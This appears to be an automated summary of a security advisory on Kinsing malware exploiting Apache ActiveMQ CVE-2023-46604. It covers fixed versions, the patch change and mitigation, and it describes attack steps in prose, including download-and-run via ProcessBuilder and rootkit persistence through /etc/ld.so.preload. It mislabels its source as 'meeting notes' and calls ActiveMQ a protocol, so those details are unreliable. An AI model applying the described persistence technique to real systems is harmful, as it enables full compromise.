CVE-2023-46604 (Apache ActiveMQ) Exploited to Infect Systems With Cryptominers and Rootkits

CVE-2023-46604 (Apache ActiveMQ) Exploited to Infect Systems With Cryptominers and Rootkits

November 20, 2023 at 04:16AM

The Apache ActiveMQ vulnerability CVE-2023-46604 is being actively exploited by threat actors to download and infect Linux systems with the Kinsing malware and cryptocurrency miner. The vulnerability allows remote code execution, which Kinsing utilizes to install malware. Users are advised to upgrade their ActiveMQ versions to address the issue. The Kinsing malware is a critical threat that targets Linux-based systems and can spread rapidly across a network. It is recommended to take immediate action to patch the vulnerability and enhance cybersecurity measures.

Key takeaways from the meeting notes:

1. Exploitation of Apache ActiveMQ vulnerability CVE-2023-46604: The meeting notes highlight the active exploitation of the vulnerability CVE-2023-46604 in Apache ActiveMQ, an open-source protocol for message-oriented middleware. This vulnerability allows for remote code execution (RCE) and has been exploited by threat actors to download and infect Linux systems with the Kinsing malware, also known as h2miner, and cryptocurrency miner.

2. Kinsing malware: Kinsing is a critical threat that primarily targets Linux-based systems. It infiltrates servers and spreads rapidly across networks by exploiting vulnerabilities in web applications or misconfigured container environments. Once installed, it deploys a cryptocurrency-mining script that exploits the host’s resources to mine cryptocurrencies like Bitcoin, causing damage to the infrastructure and impacting system performance.

3. Affected versions: The meeting notes provide a list of Apache ActiveMQ versions that are vulnerable to CVE-2023-46604. Users are recommended to upgrade both Java OpenWire brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to fix the issue.

4. Patch difference: The meeting notes mention a patch difference based on the analysis of the vulnerability. The patch includes the inclusion of the validateIsThrowable method in the BaseDataStreamMarshall class, which ensures the validation of throwable class types when unmarshalling OpenWire commands.

5. Detection and detection rule: Reports of active exploitation of CVE-2023-46604 have been surfaced, and a YARA rule is provided in the meeting notes for scanning purposes. The YARA rule can be used to detect the exploit variant used by the Kinsing malware for CVE-2023-46604.

6. Kinsing exploitation: The meeting notes provide insights into how Kinsing exploits CVE-2023-46604. The malware leverages the ProcessBuilder method to execute commands on affected systems, downloading and executing Kinsing cryptocurrency miners and malware. It also searches for competing cryptocurrency miners and removes them from the infected host.

7. Persistence and compromise: Kinsing ensures persistence on affected hosts by loading its rootkit in /etc/ld.so.preload, completing a full system compromise.

8. Mitigation measures: Organizations using Apache ActiveMQ are advised to patch CVE-2023-46604 promptly. It is also important to regularly update security patches, conduct configuration audits, and monitor network traffic for unusual activity. Additionally, utilizing comprehensive security solutions and employing a multilayered defense strategy is recommended.

9. Additional protection: The meeting notes provide rules and filters that can provide additional protection against CVE-2023-46604 exploits, including Trend Micro™ Managed XDR and Trend Micro™ Deep Security™ IPS rules.

10. Indicators of Compromise (IOCs): The meeting notes mention the availability of indicators of compromise for the discussed entry. These IOCs can aid in detecting and responding to the Kinsing malware and its associated activities.

Full Article